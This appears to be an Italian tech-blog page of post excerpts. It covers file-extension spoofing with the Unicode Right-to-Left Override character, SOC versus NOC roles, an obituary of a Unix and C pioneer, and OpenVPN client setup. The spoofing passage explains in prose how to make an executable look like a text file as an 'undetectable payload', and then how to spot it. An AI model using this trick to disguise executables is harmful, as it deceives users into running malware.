nascoste dal sistema operativo Windows. Per aggirare questo problema, usa un carattere Unicode chiamato " Right-to-Left Override " (RLO) per invertire l'ordine di visualizzazione dei caratteri nel nome del file. È importante capire poiché i personaggi non vengono effettivamente invertiti, il modo in cui Windows visualizza i caratteri viene invertito. Windows riconoscerà comunque l'estensione del file come EXE.Come si vede nella GIF sopra, il carattere RLO invisibile viene inserito tra il nome del file ("fake") e l'estensione del file fake ("txt"). Tutto ciò che il carattere RLO sta facendo qui è invertire l'ordine in cui vengono visualizzati i caratteri nel nome del file. Sfortunatamente, "exe" deve rimanere nel nome del file falsificato. Come proteggersi dagli attacchi di spoofing delle estensioni di file Poiché il nostro obiettivo qui era quello di creare un payload non rilevabile, il software antivirus non è davvero una buona opzione per la protezione da questi tipi di attacchi di spoofing delle estensioni di file. Una cosa che puoi fare è semplicemente mettere la lente d'ingrandimento quando guardi i file che scarichi da Internet. Nel nostro caso sopra, non sarai in grado di dire a prima vista che l'icona non è la stessa di altri file di testo, ma a un esame più attento, vedrai che qualcosa è sospetto. Se sospetti di un file o della sua origine, prova a rinominarlo. Fare attenzione a non fare doppio clic su di esso. Invece, fai clic con il pulsante destro del mouse sul file e scegli l'opzione "Rinomina" dal menu contestuale. Se viene utilizzato Unicode, rinominare il file utilizzando i caratteri trovati sulle tastiere standard rimuoverà Unicode, rivelando la sua vera estensione.
I SOC e i Network Operations Center (NOC) differiscono fondamentalmente, ma svolgono un ruolo complementare l'uno all'altro. Nonostante le loro differenze, entrambi lavorano per riconoscere, valutare e rispondere ai problemi che interessano l'azienda. Tuttavia, ci sono differenze tra loro. NOC I NOC vengono utilizzati principalmente per rispondere a vari avvisi e minacce che possono influire sulla disponibilità e sulle prestazioni di un'azienda. Quando si tratta di NOC, si concentrano sulla tua infrastruttura IT come i tuoi programmi e macchine virtuali, server e database. La responsabilità principale del tuo NOC sarà individuare i problemi nell'infrastruttura IT e risolverli rapidamente. SOC Mentre il NOC si concentra sulla protezione dell'infrastruttura IT e online, un SOC si concentra principalmente sulla protezione delle risorse online. Invece di proteggere infrastrutture come server o macchine virtuali, un SOC protegge i tuoi dati dai criminali informa...
E' morto, dopo una lunga malattia, uno dei pionieri dell'informatica moderna. Nato a Bronxville, New York, si laureò ad Harvard, e dal 1967 iniziò a lavorare presso i Laboratori Bell, nel loro centro di ricerca informatico; qui sviluppò la prima versione del sistema operativo Unix e scrisse il primo Unix Programmer's Manual (1971). [Tratto da WIKIPEDIA] Insieme a Brian Kernighan e Ken Thompson sviluppò poi il linguaggio di programmazione C. Il C è stato la base di partenza per lo sviluppo di molte altre piattaforme sviluppate in seguito (tra le più importanti ricordiamo: C++, Java, PHP, Perl). Premi e Riconoscimenti: Nel 1983, Ritchie e Ken Thompson ricevono congiuntamente il premio Turing per il loro sviluppo della teoria generica dei sistemi operativi e, in particolare per l'attuazione del sistema operativo UNIX. IEEE Richard W. Hamming Medaglia Nel 1990, sia Ritchie e Ken Thompson hanno ricevuto la Medaglia d'IEEE Richard W. Hammingp...
Lo scopo di questo breve documento è di guidare l'utente nella configurazione del proprio client per accedere tramite OpenVPN alla propria LAN. Si prenderanno in considerazione le principali GUI di OpenVPN per Microsoft Windows, Linux, Mac OS X, Windows Mobile per Pocket PC e alla fine l'uso di OpenVPN da linea di comando senza interfaccia grafica. Quest'ultima possibilità risulta utile poiché il comando openvpn , richiamabile da prompt (sia esso una shell Unix che il prompt dei comandi Windows), accetta i medesimi parametri e si comporta nella stessa maniera indipendentemente dalla piattaforma. Peraltro, il comando openvpn può essere utilizzato negli script per automatizzare l'avvio automatico delle VPN. L'obiettivo che ci prefiggiamo è di accedere ad un server VPN realizzato con Zeroshell e configurato con i parametri di default. Per realizzare tale server sarà pertanto sufficiente, una volta messo in rete un server Zeroshell, semplicemente abilitare il servizi...
Commenti